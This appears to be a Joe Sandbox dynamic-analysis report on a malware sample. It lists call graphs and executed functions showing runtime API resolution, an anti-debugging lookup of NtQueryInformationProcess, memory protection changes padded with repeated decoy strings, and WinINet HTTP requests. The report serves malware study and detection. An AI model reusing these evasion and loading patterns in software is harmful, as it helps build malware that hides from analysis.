d34f77 codecvt 37552 d4aab0 lstrcpy 37548->37552 37551 d34f6b 37549->37551 37554 d4acc0 4 API calls 37550->37554 37553 d4abb0 lstrcpy 37551->37553 37565 d34fa7 37552->37565 37553->37548 37555 d349f9 37554->37555 37556 d4abb0 lstrcpy 37555->37556 37557 d34a02 37556->37557 37558 d4acc0 4 API calls 37557->37558 37559 d34a21 37558->37559 37560 d4abb0 lstrcpy 37559->37560 37561 d34a2a 37560->37561 37562 d4ac30 3 API calls 37561->37562 37563 d34a48 37562->37563 37564 d4abb0 lstrcpy 37563->37564 37566 d34a51 37564->37566 37565->36587 37567 d4acc0 4 API calls 37566->37567 37568 d34a70 37567->37568 37569 d4abb0 lstrcpy 37568->37569 37570 d34a79 37569->37570 37571 d4acc0 4 API calls 37570->37571 37572 d34a98 37571->37572 37573 d4abb0 lstrcpy 37572->37573 37574 d34aa1 37573->37574 37575 d4acc0 4 API calls 37574->37575 37576 d34acd 37575->37576 37577 d4ac30 3 API calls 37576->37577 37578 d34ad4 37577->37578 37579 d4abb0 lstrcpy 37578->37579 37580 d34add 37579->37580 37581 d34af3 InternetConnectA 37580->37581 37581->37537 37582 d34b23 HttpOpenRequestA 37581->37582 37584 d34b78 37582->37584 37585 d34f0e InternetCloseHandle 37582->37585 37586 d4acc0 4 API calls 37584->37586 37585->37537 37587 d34b8c 37586->37587 37588 d4abb0 lstrcpy 37587->37588 37589 d34b95 37588->37589 37590 d4ac30 3 API calls 37589->37590 37591 d34bb3 37590->37591 37592 d4abb0 lstrcpy 37591->37592 37593 d34bbc 37592->37593 37594 d4acc0 4 API calls 37593->37594 37595 d34bdb 37594->37595 37596 d4abb0 lstrcpy 37595->37596 37597 d34be4 37596->37597 37598 d4acc0 4 API calls 37597->37598 37599 d34c05 37598->37599 37600 d4abb0 lstrcpy 37599->37600 37601 d34c0e 37600->37601 37602 d4acc0 4 API calls 37601->37602 37603 d34c2e 37602->37603 37604 d4abb0 lstrcpy 37603->37604 37605 d34c37 37604->37605 37606 d4acc0 4 API calls 37605->37606 37607 d34c56 37606->37607 37608 d4abb0 lstrcpy 37607->37608 37609 d34c5f 37608->37609 37610 d4ac30 3 API calls 37609->37610 37611 d34c7d 37610->37611 37612 d4abb0 lstrcpy 37611->37612 37613 d34c86 37612->37613 37614 d4acc0 4 API calls 37613->37614 37615 d34ca5 37614->37615 37616 d4abb0 lstrcpy 37615->37616 37617 d34cae 37616->37617 37618 d4acc0 4 API calls 37617->37618 37619 d34ccd 37618->37619 37620 d4abb0 lstrcpy 37619->37620 37621 d34cd6 37620->37621 37622 d4ac30 3 API calls 37621->37622 37623 d34cf4 37622->37623 37624 d4abb0 lstrcpy 37623->37624 37625 d34cfd 37624->37625 37626 d4acc0 4 API calls 37625->37626 37627 d34d1c 37626->37627 37628 d4abb0 lstrcpy 37627->37628 37629 d34d25 37628->37629 37630 d4acc0 4 API calls 37629->37630 37631 d34d46 37630->37631 37632 d4abb0 lstrcpy 37631->37632 37633 d34d4f 37632->37633 37634 d4acc0 4 API calls 37633->37634 37635 d34d6f 37634->37635 37636 d4abb0 lstrcpy 37635->37636 37637 d34d78 37636->37637 37638 d4acc0 4 API calls 37637->37638 37639 d34d97 37638->37639 37640 d4abb0 lstrcpy 37639->37640 37641 d34da0 37640->37641 37642 d4ac30 3 API calls 37641->37642 37643 d34dbe 37642->37643 37644 d4abb0 lstrcpy 37643->37644 37645 d34dc7 37644->37645 37646 d4aa50 lstrcpy 37645->37646 37647 d34de2 37646->37647 37648 d4ac30 3 API calls 37647->37648 37649 d34e03 37648->37649 37650 d4ac30 3 API calls 37649->37650 37651 d34e0a 37650->37651 37652 d4abb0 lstrcpy 37651->37652 37653 d34e16 37652->37653 37654 d34e37 lstrlen 37653->37654 37655 d34e4a 37654->37655 37656 d34e53 lstrlen 37655->37656 37744 d4ade0 37656->37744 37658 d34e63 HttpSendRequestA 37659 d34e82 InternetReadFile 37658->37659 37660 d34eb7 InternetCloseHandle 37659->37660 37665 d34eae 37659->37665 37662 d4ab10 37660->37662 37662->37585 37663 d4acc0 4 API calls 37663->37665 37664 d4abb0 lstrcpy 37664->37665 37665->37659 37665->37660 37665->37663 37665->37664 37751 d4ade0 37666->37751 37668 d41a14 StrCmpCA 37669 d41a27 37668->37669 37670 d41a1f ExitProcess 37668->37670 37671 d41c12 37669->37671 37672 d41afd StrCmpCA 37669->37672 37673 d41b1f StrCmpCA 37669->37673 37674 d41bc0 StrCmpCA 37669->37674 37675 d41b41 StrCmpCA 37669->37675 37676 d41ba1 StrCmpCA 37669->37676 37677 d41b82 StrCmpCA 37669->37677 37678 d41b63 StrCmpCA 37669->37678 37679 d41aad StrCmpCA 37669->37679 37680 d41acf StrCmpCA 37669->37680 37681 d4ab30 lstrlen lstrcpy 37669->37681 37671->36589 37672->37669 37673->37669 37674->37669 37675->37669 37676->37669 37677->37669 37678->37669 37679->37669 37680->37669 37681->37669 37682->36595 37683->36597 37684->36603 37685->36605 37686->36611 37687->36613 37688->36617 37689->36621 37690->36625 37691->36631 37692->36633 37693->36637 37694->36651 37695->36655 37696->36654 37697->36650 37698->36654 37699->36673 37700->36657 37701->36659 37702->36663 37703->36668 37704->36670 37705->36676 37706->36679 37707->36686 37708->36708 37709->36712 37710->36711 37711->36707 37712->36711 37713->36721 37716 d4aab0 lstrcpy 37715->37716 37717 d316c3 37716->37717 37718 d4aab0 lstrcpy 37717->37718 37719 d316d5 37718->37719 37720 d4aab0 lstrcpy 37719->37720 37721 d316e7 37720->37721 37722 d4aab0 lstrcpy 37721->37722 37723 d315a3 37722->37723 37723->37448 37725 d34816 37724->37725 37726 d34888 lstrlen 37725->37726 37750 d4ade0 37726->37750 37728 d34898 InternetCrackUrlA 37729 d348b7 37728->37729 37729->37525 37731 d4aa50 lstrcpy 37730->37731 37732 d48d04 37731->37732 37733 d4aa50 lstrcpy 37732->37733 37734 d48d12 GetSystemTime 37733->37734 37735 d48d29 37734->37735 37736 d4aab0 lstrcpy 37735->37736 37737 d48d8c 37736->37737 37737->37540 37739 d4ac41 37738->37739 37740 d4ac98 37739->37740 37742 d4ac78 lstrcpy lstrcat 37739->37742 37741 d4aab0 lstrcpy 37740->37741 37743 d4aca4 37741->37743 37742->37740 37743->37543 37744->37658 37746 d34f3e 37745->37746 37747 d3a249 LocalAlloc 37745->37747 37746->37546 37746->37548 37747->37746 37748 d3a264 CryptStringToBinaryA 37747->37748 37748->37746 37749 d3a289 LocalFree 37748->37749 37749->37746 37750->37728 37751->37668

                                      Executed Functions

                                      Function 00D49BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 660 d49bb0-d49bc4 call d49aa0 663 d49de3-d49e42 LoadLibraryA * 5 660->663 664 d49bca-d49dde call d49ad0 GetProcAddress * 21 660->664 666 d49e44-d49e58 GetProcAddress 663->666 667 d49e5d-d49e64 663->667 664->663 666->667 669 d49e96-d49e9d 667->669 670 d49e66-d49e91 GetProcAddress * 2 667->670 671 d49e9f-d49eb3 GetProcAddress 669->671 672 d49eb8-d49ebf 669->672 670->669 671->672 673 d49ec1-d49ed4 GetProcAddress 672->673 674 d49ed9-d49ee0 672->674 673->674 675 d49f11-d49f12 674->675 676 d49ee2-d49f0c GetProcAddress * 2 674->676 676->675
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,01672218), ref: 00D49BF1
                                      • GetProcAddress.KERNEL32(74DD0000,01672368), ref: 00D49C0A
                                      • GetProcAddress.KERNEL32(74DD0000,016723F8), ref: 00D49C22
                                      • GetProcAddress.KERNEL32(74DD0000,016723C8), ref: 00D49C3A
                                      • GetProcAddress.KERNEL32(74DD0000,016723E0), ref: 00D49C53
                                      • GetProcAddress.KERNEL32(74DD0000,016791C8), ref: 00D49C6B
                                      • GetProcAddress.KERNEL32(74DD0000,01665890), ref: 00D49C83
                                      • GetProcAddress.KERNEL32(74DD0000,01665790), ref: 00D49C9C
                                      • GetProcAddress.KERNEL32(74DD0000,016722D8), ref: 00D49CB4
                                      • GetProcAddress.KERNEL32(74DD0000,01672440), ref: 00D49CCC
                                      • GetProcAddress.KERNEL32(74DD0000,01672470), ref: 00D49CE5
                                      • GetProcAddress.KERNEL32(74DD0000,01672338), ref: 00D49CFD
                                      • GetProcAddress.KERNEL32(74DD0000,016656B0), ref: 00D49D15
                                      • GetProcAddress.KERNEL32(74DD0000,01672230), ref: 00D49D2E
                                      • GetProcAddress.KERNEL32(74DD0000,01672248), ref: 00D49D46
                                      • GetProcAddress.KERNEL32(74DD0000,01665950), ref: 00D49D5E
                                      • GetProcAddress.KERNEL32(74DD0000,01672260), ref: 00D49D77
                                      • GetProcAddress.KERNEL32(74DD0000,01672290), ref: 00D49D8F
                                      • GetProcAddress.KERNEL32(74DD0000,016657F0), ref: 00D49DA7
                                      • GetProcAddress.KERNEL32(74DD0000,016722A8), ref: 00D49DC0
                                      • GetProcAddress.KERNEL32(74DD0000,01665910), ref: 00D49DD8
                                      • LoadLibraryA.KERNEL32(01672578,?,00D46CA0), ref: 00D49DEA
                                      • LoadLibraryA.KERNEL32(01672518,?,00D46CA0), ref: 00D49DFB
                                      • LoadLibraryA.KERNEL32(01672530,?,00D46CA0), ref: 00D49E0D
                                      • LoadLibraryA.KERNEL32(01672590,?,00D46CA0), ref: 00D49E1F
                                      • LoadLibraryA.KERNEL32(01672548,?,00D46CA0), ref: 00D49E30
                                      • GetProcAddress.KERNEL32(75A70000,016725A8), ref: 00D49E52
                                      • GetProcAddress.KERNEL32(75290000,016725C0), ref: 00D49E73
                                      • GetProcAddress.KERNEL32(75290000,016725D8), ref: 00D49E8B
                                      • GetProcAddress.KERNEL32(75BD0000,01672560), ref: 00D49EAD
                                      • GetProcAddress.KERNEL32(75450000,016657B0), ref: 00D49ECE
                                      • GetProcAddress.KERNEL32(76E90000,01679178), ref: 00D49EEF
                                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00D49F06
                                      Strings
                                      • NtQueryInformationProcess, xrefs: 00D49EFA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: NtQueryInformationProcess
                                      • API String ID: 2238633743-2781105232
                                      • Opcode ID: 41aff88a6d72b5f4d66724fffce69c951c30601a713e4854ccab41ec01ac90cb
                                      • Instruction ID: 38c5c7e266c895d80200b1628adb712535aa6ebe5f28b52dc9c1e41c9f24e335
                                      • Opcode Fuzzy Hash: 41aff88a6d72b5f4d66724fffce69c951c30601a713e4854ccab41ec01ac90cb
                                      • Instruction Fuzzy Hash: E8A122B5500240DFC366DFA9E89899677BAA74D701F10861AB9C9C3298D73FB950CFB0
                                      Function 00D34610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 764 d34610-d346e5 RtlAllocateHeap 781 d346f0-d346f6 764->781 782 d3479f-d347f9 VirtualProtect 781->782 783 d346fc-d3479a 781->783 783->781
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D3465E
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00D347EC
                                      Strings
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D347C0
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346B2
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3476E
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34622
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D347B5
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346D3
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34693
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346A7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D347CB
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34688
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3471D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34672
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3467D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34712
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34667
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3479F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34779
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34707
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34617
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346C8
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3462D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346BD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34638
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34784
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34763
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34728
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D347AA
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3478F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34643
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346FC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeapProtectVirtual
                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                      • API String ID: 1542196881-2218711628
                                      • Opcode ID: 90f562a4c8f0bafb1e15398973944ed5c9fdd86e39f1495f7419d616b5ab9cb5
                                      • Instruction ID: 8c7c6a08b50dbec788d338e4285b23facde6a9a1316dadf5567027f4b6282289
                                      • Opcode Fuzzy Hash: 90f562a4c8f0bafb1e15398973944ed5c9fdd86e39f1495f7419d616b5ab9cb5
                                      • Instruction Fuzzy Hash: 7F412D686C3615EFCB39BBA8BC52FDD76635F53782F40504CBF2812284CAB0650C49BA
                                      Function 00D362D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1033 d362d0-d3635b call d4aab0 call d34800 call d4aa50 InternetOpenA StrCmpCA 1040 d36364-d36368 1033->1040 1041 d3635d 1033->1041 1042 d36559-d36575 call d4aab0 call d4ab10 * 2 1040->1042 1043 d3636e-d36392 InternetConnectA 1040->1043 1041->1040 1062 d36578-d3657d 1042->1062 1045 d36398-d3639c 1043->1045 1046 d3654f-d36553 InternetCloseHandle 1043->1046 1048 d363aa 1045->1048 1049 d3639e-d363a8 1045->1049 1046->1042 1051 d363b4-d363e2 HttpOpenRequestA 1048->1051 1049->1051 1052 d36545-d36549 InternetCloseHandle 1051->1052 1053 d363e8-d363ec 1051->1053 1052->1046 1055 d36415-d36455 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 d363ee-d3640f InternetSetOptionA 1053->1056 1058 d36457-d36477 call d4aa50 call d4ab10 * 2 1055->1058 1059 d3647c-d3649b call d48ad0 1055->1059 1056->1055 1058->1062 1067 d36519-d36539 call d4aa50 call d4ab10 * 2 1059->1067 1068 d3649d-d364a4 1059->1068 1067->1062 1071 d36517-d3653f InternetCloseHandle 1068->1071 1072 d364a6-d364d0 InternetReadFile 1068->1072 1071->1052 1076 d364d2-d364d9 1072->1076 1077 d364db 1072->1077 1076->1077 1078 d364dd-d36515 call d4acc0 call d4abb0 call d4ab10 1076->1078 1077->1071 1078->1072
                                      APIs
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34889
                                        • Part of subcall function 00D34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34899
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • InternetOpenA.WININET(00D50DFF,00000001,00000000,00000000,00000000), ref: 00D36331
                                      • StrCmpCA.SHLWAPI(?,0167E7D8), ref: 00D36353
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36385
                                      • HttpOpenRequestA.WININET(00000000,GET,?,0167E3F8,00000000,00000000,00400100,00000000), ref: 00D363D5
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D3640F
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D36421
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00D3644D
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D364BD
                                      • InternetCloseHandle.WININET(00000000), ref: 00D3653F
                                      • InternetCloseHandle.WININET(00000000), ref: 00D36549
                                      • InternetCloseHandle.WININET(00000000), ref: 00D36553
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: ERROR$ERROR$GET
                                      • API String ID: 3749127164-2509457195
                                      • Opcode ID: 2c431fc47d1f9f143c6809085817432ea509640ed74c995adc947b5bb4bd2712
                                      • Instruction ID: 957461aa91c37f7d901a39d4f773a1a4353301619d76ac742e9e84b3c2585765
                                      • Opcode Fuzzy Hash: 2c431fc47d1f9f143c6809085817432ea509640ed74c995adc947b5bb4bd2712
                                      • Instruction Fuzzy Hash: F5715E71A40218ABEF24DFA4CC59FEE7775EB44700F1081A9F50A6B1C4DBB5AA84CF61
                                      Function 00D47690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                      Download Yara Rule

